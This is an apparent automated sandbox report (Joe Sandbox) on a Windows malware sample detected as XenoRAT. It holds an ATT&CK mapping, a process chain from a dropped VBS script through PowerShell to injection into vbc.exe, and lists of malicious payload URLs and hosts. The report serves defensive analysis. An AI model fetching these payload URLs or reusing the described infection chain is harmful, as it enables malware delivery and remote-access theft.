            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D88964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF6A1D88964
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D82C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF6A1D82C54
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected XenoRAT
            Source: Yara matchFile source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2278176981.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected XenoRAT
            Source: Yara matchFile source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2278176981.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information111
            Scripting            		Valid Accounts2
            Native API            		111
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		OS Credential Dumping1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		1
            Install Root Certificate            		LSASS Memory2
            File and Directory Discovery            		Remote Desktop ProtocolData from Removable Media21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		211
            Process Injection            		1
            Software Packing            		Security Account Manager16
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login Hook1
            Registry Run Keys / Startup Folder            		1
            Timestomp            		NTDS1
            Security Software Discovery            		Distributed Component Object ModelInput Capture14
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets1
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Modify Registry            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron211
            Process Injection            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Rundll32            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1611341 Sample: SecuriteInfo.com.Win64.Malw... Startdate: 10/02/2025 Architecture: WINDOWS Score: 100 45 ofice365.github.io 2->45 47 bitbucket.org 2->47 55 Suricata IDS alerts for network traffic 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 13 other signatures 2->61 13 SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe 1 3 2->13         started        16 rundll32.exe 2->16         started        signatures3 process4 file5 43 C:\Users\user\AppData\...\67a7e5e159f71.vbs, ASCII 13->43 dropped 18 cmd.exe 3 2 13->18         started        process6 process7 20 wscript.exe 1 18->20         started        23 conhost.exe 18->23         started        signatures8 63 Suspicious powershell command line found 20->63 65 Wscript starts Powershell (via cmd or directly) 20->65 67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->67 69 Suspicious execution chain found 20->69 25 powershell.exe 7 20->25         started        process9 signatures10 71 Suspicious powershell command line found 25->71 73 Found suspicious powershell code related to unpacking or dynamic code loading 25->73 28 powershell.exe 14 23 25->28         started        32 conhost.exe 25->32         started        process11 dnsIp12 49 ofice365.github.io 185.199.108.153, 443, 49711 FASTLYUS Netherlands 28->49 51 62.60.226.64, 49759, 80 ASLINE-AS-APASLINELIMITEDHK Iran (ISLAMIC Republic Of) 28->51 53 bitbucket.org 185.166.143.49, 443, 49709 AMAZON-02US Germany 28->53 75 Installs new ROOT certificates 28->75 77 Writes to foreign memory regions 28->77 79 Injects a PE file into a foreign processes 28->79 81 Loading BitLocker PowerShell Module 28->81 34 vbc.exe 4 28->34         started        signatures13 process14 file15 41 C:\Users\user\AppData\Roaming\...\Vbc.exe, PE32 34->41 dropped 37 Vbc.exe 1 34->37         started        process16 process17 39 conhost.exe 37->39         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe41%VirustotalBrowse
            SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe39%ReversingLabsWin64.Trojan.Amadey

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://62.60.226.64/public_files/Sjofbrd.txt100%Avira URL Cloudmalware
            https://ofice365.github.io/1/test.jpg100%Avira URL Cloudmalware
            https://preferences.atlassian.com0%Avira URL Cloudsafe
            failed2.myftp.org0%Avira URL Cloudsafe
            https://ofice365.github.io100%Avira URL Cloudmalware
            https://bitbucket.status.atlassian.com/0%Avira URL Cloudsafe
            https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d0%Avira URL Cloudsafe
            https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bitbucket.org
            		185.166.143.49
            		truefalse
              		high
              ofice365.github.io
              		185.199.108.153
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://ofice365.github.io/1/test.jpgtrue
                • Avira URL Cloud: malware
                		unknown
                http://62.60.226.64/public_files/Sjofbrd.txttrue
                • Avira URL Cloud: malware
                		unknown
                https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113false
                  		high
                  failed2.myftp.orgtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/entry/adpowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://id.atlassian.com/loginpowershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://ofice365.github.iopowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://id.atlassian.com/logoutpowershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://admin.atlassian.compowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.bitbucket.orgpowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://preferences.atlassian.compowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://id.atlassian.com/manage-profile/powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/entry/appowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/entry/vepowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/jsi18n/en/djpowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.atlassian.com/try/cloud/signup?bundle=bitbucketpowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://bitbucket.status.atlassian.com/powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://cdn.cookielaw.org/powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/img/logos/bipowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=dpowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://id.atlassian.com/profile/rest/profile&quot;powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://aui-cdn.atlassian.com/powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://aka.ms/pscore68powershell.exe, 00000005.00000002.2582750813.0000026087457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2582750813.0000026087494000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031EE11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/themes/apowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://bitbucket.org/gateway/api/emoji/powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://bqlf8qjztdtr.statuspage.iopowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2582750813.00000260874C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031EE11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://bitbucket.orgpowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/dist/webpackpowershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/img/default_powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fccccccccccccnpowershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          62.60.226.64
                                                                                          		unknownIran (ISLAMIC Republic Of)
                                                                                          		18013ASLINE-AS-APASLINELIMITEDHKtrue
                                                                                          185.166.143.49
                                                                                          		bitbucket.orgGermany
                                                                                          		16509AMAZON-02USfalse
                                                                                          185.199.108.153
                                                                                          		ofice365.github.ioNetherlands
                                                                                          		54113FASTLYUStrue

                                                                                          General Information

                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1611341
                                                                                          Start date and time:2025-02-10 19:57:24 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 5m 14s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:16
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.spre.troj.expl.evad.winEXE@18/11@2/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 33.3%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 37
                                                                                          • Number of non-executed functions: 29
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 1352 because it is empty
                                                                                          • Execution Graph export aborted for target vbc.exe, PID 2404 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          13:58:16API Interceptor46x Sleep call for process: powershell.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          62.60.226.64dDFw6mJ.exeGet hashmaliciousVidarBrowse
                                                                                          • 62.60.226.64/public_files/kjgjgfS.txt
                                                                                          Set-UPl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 62.60.226.64/public_files/mearpck.txt
                                                                                          good.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                          • 62.60.226.64/public_files/kmAFAhc.txt
                                                                                          185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                          • jasonj002.bitbucket.io/
                                                                                          185.199.108.153http://jp-iitkgp.github.io/SAC_instaGet hashmaliciousHTMLPhisherBrowse
                                                                                          • jp-iitkgp.github.io/SAC_insta
                                                                                          http://adhi-ns.github.io/netflixGet hashmaliciousHTMLPhisherBrowse
                                                                                          • adhi-ns.github.io/netflix
                                                                                          http://akhi1704.github.io/tailwind_fb-cloneGet hashmaliciousHTMLPhisherBrowse
                                                                                          • akhi1704.github.io/tailwind_fb-clone
                                                                                          http://adarsh389.github.io/adarsh.instagram/Get hashmaliciousHTMLPhisherBrowse
                                                                                          • adarsh389.github.io/adarsh.instagram/
                                                                                          http://sumitumrao.github.io/Netflixclone/Get hashmaliciousHTMLPhisherBrowse
                                                                                          • sumitumrao.github.io/Netflixclone/
                                                                                          http://amitekharr.github.io/abGet hashmaliciousUnknownBrowse
                                                                                          • amitekharr.github.io/ab
                                                                                          http://brownnaza222.github.io/myfbsampleGet hashmaliciousHTMLPhisherBrowse
                                                                                          • brownnaza222.github.io/myfbsample
                                                                                          http://somya-patidar.github.io/netflixGet hashmaliciousHTMLPhisherBrowse
                                                                                          • somya-patidar.github.io/netflix
                                                                                          http://adarsh389.github.io/adarsh.instagramGet hashmaliciousHTMLPhisherBrowse
                                                                                          • adarsh389.github.io/adarsh.instagram
                                                                                          http://janvi426.github.io/Netflix-Home-Page-CloneGet hashmaliciousHTMLPhisherBrowse
                                                                                          • janvi426.github.io/Netflix-Home-Page-Clone

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          ofice365.github.iopayment copy.vbsGet hashmaliciousDiscord Token StealerBrowse
                                                                                          • 185.199.108.153
                                                                                          dDFw6mJ.exeGet hashmaliciousVidarBrowse
                                                                                          • 185.199.108.153
                                                                                          bitbucket.orghttps://angelapledfgww.github.io/claragelz/claradetailsforijf.htmlGet hashmaliciousUnknownBrowse
                                                                                          • 185.166.143.49
                                                                                          Payment slip.vbsGet hashmaliciousDiscord Token StealerBrowse
                                                                                          • 185.166.143.48
                                                                                          00wVZ1NU5b.exeGet hashmaliciousUnknownBrowse
                                                                                          • 185.166.143.49
                                                                                          Set-UPl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 185.166.143.48
                                                                                          good.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                          • 185.166.143.48
                                                                                          phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 185.166.143.48
                                                                                          phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                          • 185.166.143.50
